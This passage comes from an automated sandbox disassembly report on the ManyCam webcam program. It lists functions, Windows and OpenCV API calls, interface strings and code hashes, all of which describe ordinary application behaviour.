Inner function failed., xrefs: 00C1292B
Unsupported format, xrefs: 00C129E2
cvMean_StdDev, xrefs: 00C12930, 00C1296E, 00C129E7, 00C12A27, 00C12ABE, 00C12BCA
.\cxmeansdv.cpp, xrefs: 00C12926, 00C12964, 00C129DD, 00C12A1D, 00C12AB4, 00C12BC0

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus$From
String ID: .\cxmeansdv.cpp$Inner function failed.$OpenCV function failed$The input array must have at most 4 channels unless COI is set$Unsupported format$cvMean_StdDev
API String ID: 3196198995-1906207271
Opcode ID: d4d7b18cca2a6b0a542586cfa1d5ce48359c4b64c96fc3595a43dc337da2988a
Instruction ID: 7dca02c68f04344b183c44f56f9edef5ec102244cb2baaaaafa119dcec3e2730
Opcode Fuzzy Hash: d4d7b18cca2a6b0a542586cfa1d5ce48359c4b64c96fc3595a43dc337da2988a
Instruction Fuzzy Hash: 90B1BCB5208700EBD720CF05D881AABB7F5FBCA704F244A5DF49597291D7B0E990EB92

Function 00472C60 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 270memoryCOMMON

Download Yara Rule

APIs

_wfopen_s.MSVCR80 ref: 00472CBE
fclose.MSVCR80 ref: 00472CDF
_DebugHeapAllocator.LIBCPMTD ref: 00472D41
_DebugHeapAllocator.LIBCPMTD ref: 00472D53
_DebugHeapAllocator.LIBCPMTD ref: 00472E2E
_DebugHeapAllocator.LIBCPMTD ref: 00472E59
_DebugHeapAllocator.LIBCPMTD ref: 00472E98

Strings

class, xrefs: 00472D67
base_class, xrefs: 00472DD6
name, xrefs: 00472F2B
val, xrefs: 00472F52
prop, xrefs: 00472F05

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$_wfopen_sfclose
String ID: base_class$class$name$prop$val
API String ID: 1905607448-2961531382
Opcode ID: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
Instruction ID: 751db2e67e60f486d96aaf90422ccf13f7de2e4e99e3856fc400571b524def08
Opcode Fuzzy Hash: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
Instruction Fuzzy Hash: 47C14C70901258DEDB14EBA4CD55BEEBBB4BF50308F10819EE14A67292DB781F88CF95

Function 00C04080 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 187COMMON

Download Yara Rule

APIs

cvGetMat.GLU32 ref: 00C040B6
cvGetErrStatus.GLU32(?,?,00000000), ref: 00C040C0
cvError.GLU32(000000FF,cvSetIdentity,Inner function failed.,.\cxmatrix.cpp,00000041,?,?,00000000), ref: 00C040DC
cvError.GLU32(000000E8,cvSetIdentity,coi is not supported,.\cxmatrix.cpp,00000043), ref: 00C04103
cvErrorFromIppStatus.GLU32(00000000,cvSetIdentity,OpenCV function failed,.\cxmatrix.cpp,00000057,?,?,?,?), ref: 00C041A3
cvError.GLU32(00000000,?,?,?,00000000), ref: 00C041AC
cvScalarToRawData.GLU32(?,?,-00000001,00000000,?,?,?,?), ref: 00C04233

Strings

OpenCV function failed, xrefs: 00C04198
cvSetIdentity, xrefs: 00C040D5, 00C040FC, 00C0419D
.\cxmatrix.cpp, xrefs: 00C040CB, 00C040F2, 00C04193
Inner function failed., xrefs: 00C040D0
coi is not supported, xrefs: 00C040F7

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$DataFromScalar
String ID: .\cxmatrix.cpp$Inner function failed.$OpenCV function failed$coi is not supported$cvSetIdentity
API String ID: 469994097-1910902401
Opcode ID: b19d3b31cf11f6b6fa351bdc74b0e6f79c38dd1f6125752ffe6576be40409e82
Instruction ID: 8988664aa26d423b6d2613e0f8cae611f9ab8af06b68bd8eddae3ec223183197
Opcode Fuzzy Hash: b19d3b31cf11f6b6fa351bdc74b0e6f79c38dd1f6125752ffe6576be40409e82
Instruction Fuzzy Hash: B45134B6B043065BCB189E589C92B6FB398EBA4314F04093DFE15D73C1E6B0DA58C692

Function 0042E150 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0042E198

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

_DebugHeapAllocator.LIBCPMTD ref: 0042E1D1

Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE

_DebugHeapAllocator.LIBCPMTD ref: 0042E203

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

_DebugHeapAllocator.LIBCPMTD ref: 0042E23C
_DebugHeapAllocator.LIBCPMTD ref: 0042E258
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
_DebugHeapAllocator.LIBCPMTD ref: 0042E2A5

Strings

Name: , xrefs: 0042E190
www.manycam.com, xrefs: 0042E35A
www.manycam.com, xrefs: 0042E346
Creation date: , xrefs: 0042E250
Created by: , xrefs: 0042E1FB

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$DateFormat
String ID: Created by: $Creation date: $Name: $www.manycam.com$www.manycam.com
API String ID: 393568584-1701023392
Opcode ID: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
Instruction ID: cbadc1f5ef3ad51f7f35ce95d366eb704496e5c2bb1529dbc726db86d70e8f02
Opcode Fuzzy Hash: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
Instruction Fuzzy Hash: 65711771A001199FCB14EB64CD91BEEB7B4BF48304F10869DE55AA7291DF34AE88CF94

Function 00406670 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F

GetParent.USER32 ref: 0040669A
GetWindow.USER32(?,00000004), ref: 004066AD
GetWindowRect.USER32(?,?), ref: 004066C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D
GetWindowRect.USER32(00000000,?), ref: 0040673B
GetParent.USER32(?), ref: 00406749
GetClientRect.USER32(?,?), ref: 0040675A
GetClientRect.USER32(00000000,?), ref: 00406768
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040677C
SetWindowPos.USER32(744843B1,00000000,00000000,744843B1,000000FF,000000FF,00000015,?,?), ref: 00406826

Strings

*b@, xrefs: 004067BB, 004067FF, 0040680A

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$Rect$ClientLongParent$InfoParametersPointsSystem
String ID: *b@
API String ID: 2289592163-3951841937
Opcode ID: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
Instruction ID: 1e1c0fd00856f1237eb481f10da8126670bc63b2ce16d521bf68457a350c038b
Opcode Fuzzy Hash: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
Instruction Fuzzy Hash: BA611975E00209EFDB04CFE8C984AEEBBB5BF88304F148629E516BB394D734A945CB54

Function 00499CC0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00499D15
GetLastActivePopup.USER32(00000000), ref: 00499D31
SendMessageW.USER32(00000000,0000000D,00000104,?), ref: 00499D71
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00499DEB
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00499E0B
wcscat.MSVCR80 ref: 00499E61
GetPrivateProfileStringW.KERNEL32(DoNotAsk,00000000,00557E44,?,00000010,?), ref: 00499E9A
wcstoul.MSVCR80 ref: 00499EAF
MessageBeep.USER32(?), ref: 00499F1C

Strings

DoNotAsk, xrefs: 00499E95
%s%d, xrefs: 00499E31
PPMessageBox.ini, xrefs: 00499E55

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ActiveMessageName$BeepFileFullLastModulePathPopupPrivateProfileSendStringWindowwcscatwcstoul
String ID: %s%d$DoNotAsk$PPMessageBox.ini
API String ID: 3999366269-2647165371
Opcode ID: 88fe661ea0f20f6091777b59d426feaaedbdce2cd2330f005451ca6092a7d098
Instruction ID: 52c43eb377399d7600db362d3f6ba6012730098c3eeec84a0b2b3f1ac4b66590
Opcode Fuzzy Hash: 88fe661ea0f20f6091777b59d426feaaedbdce2cd2330f005451ca6092a7d098
Instruction Fuzzy Hash: D571697190022A9BEF34DB54CD85BEAB7B8FB48305F0005EAE509A76D0DB742E84DF54

Function 00BC8090 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 137COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvSeqPushMulti,NULL sequence pointer,.\cxdatastructs.cpp,0000068C), ref: 00BC80B8

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF37,cvSeqPushMulti,number of removed elements is negative,.\cxdatastructs.cpp,0000068E), ref: 00BC80E5

Strings

NULL sequence pointer, xrefs: 00BC80AC
number of removed elements is negative, xrefs: 00BC80D6
.\cxdatastructs.cpp, xrefs: 00BC80A7, 00BC80D1, 00BC81E2
cvSeqPushMulti, xrefs: 00BC80B1, 00BC80DB, 00BC81EC
Inner function failed., xrefs: 00BC81E7

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxdatastructs.cpp$Inner function failed.$NULL sequence pointer$cvSeqPushMulti$number of removed elements is negative
API String ID: 483703942-1158240429
Opcode ID: 0891762e9c8e590ab6d31af805f58aae5f96053aa641ce9fa4bb7f2e4b1cae53
Instruction ID: a8ccc55cbbb0ae86be082e0c52e76d26c94a2184f77baf146cf7d109aab47a9c
Opcode Fuzzy Hash: 0891762e9c8e590ab6d31af805f58aae5f96053aa641ce9fa4bb7f2e4b1cae53
Instruction Fuzzy Hash: 8C4144727413026BD7109E2ADD82F17B3E5FF98724F1846BDF905E3682EF60E8168691

Function 004F7A10 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 94memorylibraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004F7A47
wcscat.MSVCR80 ref: 004F7A59
_wfopen.MSVCR80 ref: 004F7A6E
fclose.MSVCR80 ref: 004F7A96
_DebugHeapAllocator.LIBCPMTD ref: 004F7ABD
LoadLibraryW.KERNEL32(00000000,manycam.dll,?), ref: 004F7ACE

Strings

install_indeo_codec, xrefs: 004F7B04
manycam.dll, xrefs: 004F7AB2
\ir50_32.dll, xrefs: 004F7A4D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugDirectoryHeapLibraryLoadSystem_wfopenfclosewcscat
String ID: \ir50_32.dll$install_indeo_codec$manycam.dll
API String ID: 2772874605-3707710387
Opcode ID: 575395483891dccec64e4652b6b9411fdd4f3bf58853aa2061394f1fea350114
Instruction ID: 8c6a274a38a71000309de35580737fca633a3ace6444322c61b51428c5e4b817
Opcode Fuzzy Hash: 575395483891dccec64e4652b6b9411fdd4f3bf58853aa2061394f1fea350114
Instruction Fuzzy Hash: E7416E71C012189FDB24EFA0ED89BAEB7B4BF08314F104299E516A7290DB786B48CF54

Function 00BA21C0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

cvCreateMatHeader.GLU32(?,?), ref: 00BA21EB

Part of subcall function 00BA2070: cvError.GLU32(FFFFFF37,cvCreateMatHeader,Non-positive width or height,.\cxarray.cpp,00000088), ref: 00BA2188
Part of subcall function 00BA2070: cvGetErrStatus.GLU32 ref: 00BA2190
Part of subcall function 00BA2070: cvReleaseMat.GLU32(?), ref: 00BA219E

cvGetErrStatus.GLU32 ref: 00BA21F5

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,cvCloneMat,Inner function failed.,.\cxarray.cpp,00000107), ref: 00BA2214
cvCreateData.GLU32(00000000), ref: 00BA2228
cvGetErrStatus.GLU32 ref: 00BA2230
cvCopy.GLU32(?,00000000,00000000), ref: 00BA2244

Part of subcall function 00BC2910: memcpy.MSVCR80(?,?,?,00000000,?), ref: 00BC2997
Part of subcall function 00BC2910: cvClearSet.GLU32(00000000,?,?,?,00000000,?), ref: 00BC29AC
Part of subcall function 00BC2910: cvFree_.GLU32(00000000,00000000,?), ref: 00BC29C6
Part of subcall function 00BC2910: cvGetErrStatus.GLU32(?,00000000,?), ref: 00BC29D1
Part of subcall function 00BC2910: cvError.GLU32(000000FF,cvCopy,Inner function failed.,.\cxcopy.cpp,00000140,?,?,00000000,?), ref: 00BC29F0

cvGetErrStatus.GLU32 ref: 00BA224C
cvError.GLU32(000000FB,cvCloneMat,Bad CvMat header,.\cxarray.cpp,00000100), ref: 00BA2272

Strings

.\cxarray.cpp, xrefs: 00BA2203, 00BA2261
Bad CvMat header, xrefs: 00BA2266
Inner function failed., xrefs: 00BA2208
cvCloneMat, xrefs: 00BA220D, 00BA226B

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$Error$Create$ClearCopyDataFree_HeaderReleasemallocmemcpy
String ID: .\cxarray.cpp$Bad CvMat header$Inner function failed.$cvCloneMat
API String ID: 2397858851-239023815
Opcode ID: f9b05a32f36a67bab1ef4bf6d1eca35096fec8b628e1a572ba38b6bb8b4e9de8
Instruction ID: ca09305cb42731305e4ccf2e57011ec1f19a9742f068564142eddf35f5877e9f
Opcode Fuzzy Hash: f9b05a32f36a67bab1ef4bf6d1eca35096fec8b628e1a572ba38b6bb8b4e9de8
Instruction Fuzzy Hash: 06012636B4830033DE3067AD7C43F5B22D59BE2B60F0402F5FA51A73C2F290A98641A5

Function 0041C950 Relevance: 19.7, APIs: 13, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetStockObject.GDI32(00000000), ref: 0041C9C4
FillRect.USER32(?,?,00000000), ref: 0041C9D3
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041C9FF
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041CA2E
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA56
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA6D
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CA97
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CAC5
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB0E
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB36
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB4D
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB77
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CBA5

Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$C__@@Draw@U3@_Utag$Width@$Rect$ClientFillHeight@ObjectStock
String ID:
API String ID: 1214153398-0
Opcode ID: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
Instruction ID: 64adb8edbe6d6a745132db4a95317a47dd4f78eb1bf019a77eab89ed2a27929a
Opcode Fuzzy Hash: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
Instruction Fuzzy Hash: 8A81C3B4D002099FDB58EF98D991BEEB7B5BF48304F20816AE519B7381DB342A45CF64

Function 00502A40 Relevance: 19.7, APIs: 13, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
Instruction ID: 12e37dd4abdcf4f70f14d239c3f2fb0002299592faa212dd5bf358f334e534ec
Opcode Fuzzy Hash: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
Instruction Fuzzy Hash: 20615470904308EFDB14DFA4D85AAEEBFB6BF55310F204A19E516AB2D1EB305A48DB50

Function 00434E60 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

Drawing over video, xrefs: 00434F75
Text over video, xrefs: 00434F36
Backgrounds, xrefs: 00435130
Date & Time, xrefs: 00434EF4
#NC, xrefs: 00434EB0, 00435002, 00435192, 004351A6, 00434FD1, 00434EB3, 00434FD4, 00435005, 00435195, 004351A9

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: #NC$Backgrounds$Date & Time$Drawing over video$Text over video
API String ID: 0-745308588
Opcode ID: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
Instruction ID: 61b0055fb2e5cbe1d4e4773f87cdc9b928e12edc189f893c90bd2281fadebac5
Opcode Fuzzy Hash: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
Instruction Fuzzy Hash: D4B14271D052189FCF08EFE5D851BEEBBB5BF48308F14452EE10A6B282DB385945CB99

Function 00499F90 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 250windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00488640: ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,0049A02E,744843B1,?,?), ref: 0048864A

Part of subcall function 00479BB0: GetSysColor.USER32(00000010), ref: 00479DFB

GetModuleHandleW.KERNEL32(00000000,744843B1,?,?), ref: 0049A14F
GetModuleHandleW.KERNEL32(00000000,744843B1,?,?), ref: 0049A16C
memset.MSVCR80 ref: 0049A286
SystemParametersInfoW.USER32(00000029,00000000,000001F8,00000000), ref: 0049A2A5
CreateFontIndirectW.GDI32(?), ref: 0049A2AF
LoadIconW.USER32(00000000,00007F01), ref: 0049A31D

Strings

p, xrefs: 0049A2F5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: HandleModule$??0?$basic_string@_ColorCreateFontIconIndirectInfoLoadParametersSystemU?$char_traits@_V?$allocator@_W@2@@std@@W@std@@memset
String ID: p
API String ID: 89581510-2181537457
Opcode ID: a881004d8c46297404a52378e96728856b1f8b23cb2602775ab0371babacd52b
Instruction ID: 0b2ca985f61fbf1d9d73a94fc23b706029f1d57e4e767938025d9d6251a87b1b
Opcode Fuzzy Hash: a881004d8c46297404a52378e96728856b1f8b23cb2602775ab0371babacd52b
